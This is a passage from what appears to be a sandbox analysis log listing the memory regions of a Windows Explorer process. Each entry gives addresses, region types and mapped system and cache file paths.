end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 490 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 491 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 492 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 493 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 494 start_va = 0x130000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 495 start_va = 0x1b0000 end_va = 0x1bcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 496 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 497 start_va = 0x1d0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 498 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 499 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 500 start_va = 0x200000 end_va = 0x219fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 501 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 502 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 503 start_va = 0x240000 end_va = 0x241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 504 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 505 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 506 start_va = 0x360000 end_va = 0x43efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 507 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 508 start_va = 0x450000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 509 start_va = 0x460000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 510 start_va = 0x560000 end_va = 0x6e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 511 start_va = 0x6f0000 end_va = 0x870fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 512 start_va = 0x880000 end_va = 0x1c7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 513 start_va = 0x1c80000 end_va = 0x1c81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c80000" filename = "" Region: id = 514 start_va = 0x1c90000 end_va = 0x1cebfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 515 start_va = 0x1cf0000 end_va = 0x1cf1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cf0000" filename = "" Region: id = 516 start_va = 0x1d00000 end_va = 0x1d01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d00000" filename = "" Region: id = 517 start_va = 0x1d10000 end_va = 0x1d12fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 518 start_va = 0x1d20000 end_va = 0x1d20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 519 start_va = 0x1d30000 end_va = 0x1d30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d30000" filename = "" Region: id = 520 start_va = 0x1d40000 end_va = 0x1dbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d40000" filename = "" Region: id = 521 start_va = 0x1dc0000 end_va = 0x1dc8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dc0000" filename = "" Region: id = 522 start_va = 0x1dd0000 end_va = 0x1dd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 523 start_va = 0x1de0000 end_va = 0x1e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001de0000" filename = "" Region: id = 524 start_va = 0x1e60000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 525 start_va = 0x1ee0000 end_va = 0x21aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 526 start_va = 0x21b0000 end_va = 0x220ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021b0000" filename = "" Region: id = 527 start_va = 0x2210000 end_va = 0x228dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 528 start_va = 0x2290000 end_va = 0x22ddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 529 start_va = 0x22e0000 end_va = 0x23dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 530 start_va = 0x23e0000 end_va = 0x2415fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 531 start_va = 0x2420000 end_va = 0x2447fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000e.db") Region: id = 532 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 533 start_va = 0x2460000 end_va = 0x2463fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 534 start_va = 0x2470000 end_va = 0x2473fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 535 start_va = 0x2480000 end_va = 0x2480fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 536 start_va = 0x2490000 end_va = 0x2490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002490000" filename = "" Region: id = 537 start_va = 0x24a0000 end_va = 0x24aefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 538 start_va = 0x24b0000 end_va = 0x24b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000024b0000" filename = "" Region: id = 539 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 540 start_va = 0x24d0000 end_va = 0x24d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 541 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 542 start_va = 0x24f0000 end_va = 0x24f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 543 start_va = 0x2500000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 544 start_va = 0x2600000 end_va = 0x2600fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 545 start_va = 0x2610000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 546 start_va = 0x2710000 end_va = 0x2710fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 547 start_va = 0x2720000 end_va = 0x2720fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 548 start_va = 0x2730000 end_va = 0x2730fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 549 start_va = 0x2740000 end_va = 0x2740fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 550 start_va = 0x2750000 end_va = 0x2750fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 551 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 552 start_va = 0x2770000 end_va = 0x2770fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 553 start_va = 0x2780000 end_va = 0x2780fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 554 start_va = 0x2790000 end_va = 0x2790fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 555 start_va = 0x27a0000 end_va = 0x27a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 556 start_va = 0x27b0000 end_va = 0x27b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 557 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 558 start_va = 0x27d0000 end_va = 0x27d0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 559 start_va = 0x27f0000 end_va = 0x27f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027f0000" filename = "" Region: id = 560 start_va = 0x2800000 end_va = 0x287ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 561 start_va = 0x2880000 end_va = 0x2881fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 562 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 563 start_va = 0x2910000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000019.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000019.db") Region: id = 564 start_va = 0x2940000 end_va = 0x2944fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 565 start_va = 0x2950000 end_va = 0x2953fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 566 start_va = 0x2960000 end_va = 0x2963fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002960000" filename = "" Region: id = 567 start_va = 0x2970000 end_va = 0x2971fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 568 start_va = 0x2980000 end_va = 0x2983fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 569 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 570 start_va = 0x29a0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 571 start_va = 0x2a20000 end_va = 0x2a27fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012024042720240428\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012024042720240428\\index.dat") Region: id = 572 start_va = 0x2a30000 end_va = 0x2a31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Region: id = 573 start_va = 0x2a40000 end_va = 0x2a40fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 574 start_va = 0x2a50000 end_va = 0x2a51fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a50000" filename = "" Region: id = 575 start_va = 0x2a60000 end_va = 0x2a66fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 576 start_va = 0x2a70000 end_va = 0x2a70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 577 start_va = 0x2a80000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a80000" filename = "" Region: id = 578 start_va = 0x2b00000 end_va = 0x2b65fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 579 start_va = 0x2b70000 end_va = 0x2b70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b70000" filename = "" Region: id = 580 start_va = 0x2b80000 end_va = 0x2b80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b80000" filename = "" Region: id = 581 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 582 start_va = 0x2ba0000 end_va = 0x2c1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 583 start_va = 0x2c20000 end_va = 0x354ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 584 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 585 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 586 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 587 start_va = 0x35e0000 end_va = 0x35e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 588 start_va = 0x35f0000 end_va = 0x3621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 589 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003630000" filename = "" Region: id = 590 start_va = 0x3640000 end_va = 0x3640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 591 start_va = 0x3650000 end_va = 0x3650fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003650000" filename = "" Region: id = 592 start_va = 0x3660000 end_va = 0x3660fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003660000" filename = "" Region: id = 593 start_va = 0x3670000 end_va = 0x3670fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003670000" filename = "" Region: id = 594 start_va = 0x3680000 end_va = 0x3680fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003680000" filename = "" Region: id = 595 start_va = 0x3690000 end_va = 0x3690fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003690000" filename = "" Region: id = 596 start_va = 0x36a0000 end_va = 0x36a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036a0000" filename = "" Region: id = 597 start_va = 0x36c0000 end_va = 0x373ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000036c0000" filename = "" Region: id = 598 start_va = 0x3740000 end_va = 0x3740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003740000" filename = "" Region: id = 599 start_va = 0x3750000 end_va = 0x3750fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 600 start_va = 0x3760000 end_va = 0x376dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 601 start_va = 0x3770000 end_va = 0x3771fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003770000" filename = "" Region: id = 602 start_va = 0x3780000 end_va = 0x3783fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 603 start_va = 0x3790000 end_va = 0x3790fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 604 start_va = 0x37a0000 end_va = 0x37a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 605 start_va = 0x37b0000 end_va = 0x37b0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{82CB5EA4-A17B-4126-A4C7-E62DCC8F64AA}.2.ver0x0000000000000003.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{82cb5ea4-a17b-4126-a4c7-e62dcc8f64aa}.2.ver0x0000000000000003.db") Region: id = 606 start_va = 0x37c0000 end_va = 0x37c0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 607 start_va = 0x37d0000 end_va = 0x37d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000037d0000" filename = "" Region: id = 608 start_va = 0x37e0000 end_va = 0x37e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wdmaud.drv.mui" filename = "\\Windows\\System32\\en-US\\wdmaud.drv.mui" (normalized: "c:\\windows\\system32\\en-us\\wdmaud.drv.mui") Region: id = 609 start_va = 0x37f0000 end_va = 0x386ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037f0000" filename = "" Region: id = 610 start_va = 0x3870000 end_va = 0x38b7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003870000" filename = "" Region: id = 611 start_va = 0x38c0000 end_va = 0x393ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038c0000" filename = "" Region: id = 612 start_va = 0x3940000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003940000" filename = "" Region: id = 613 start_va = 0x3990000 end_va = 0x3990fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mmdevapi.dll.mui" filename = "\\Windows\\System32\\en-US\\MMDevAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mmdevapi.dll.mui") Region: id = 614 start_va = 0x39a0000 end_va = 0x39a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039a0000" filename = "" Region: id = 615 start_va = 0x39b0000 end_va = 0x39b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039b0000" filename = "" Region: id = 616 start_va = 0x39c0000 end_va = 0x39c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 617 start_va = 0x39d0000 end_va = 0x39d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039d0000" filename = "" Region: id = 618 start_va = 0x39e0000 end_va = 0x39e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000039e0000" filename = "" Region: id = 619 start_va = 0x39f0000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000039f0000" filename = "" Region: id = 620 start_va = 0x3a70000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a70000" filename = "" Region: id = 621 start_va = 0x3af0000 end_va = 0x3b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003af0000" filename = "" Region: id = 622 start_va = 0x3b70000 end_va = 0x3b71fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 623 start_va = 0x3b80000 end_va = 0x3b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b80000" filename = "" Region: id = 624 start_va = 0x3b90000 end_va = 0x3c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b90000" filename = "" Region: id = 625 start_va = 0x3c10000 end_va = 0x3c20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 626 start_va = 0x3c30000 end_va = 0x3c3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 627 start_va = 0x3c40000 end_va = 0x3c47fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: 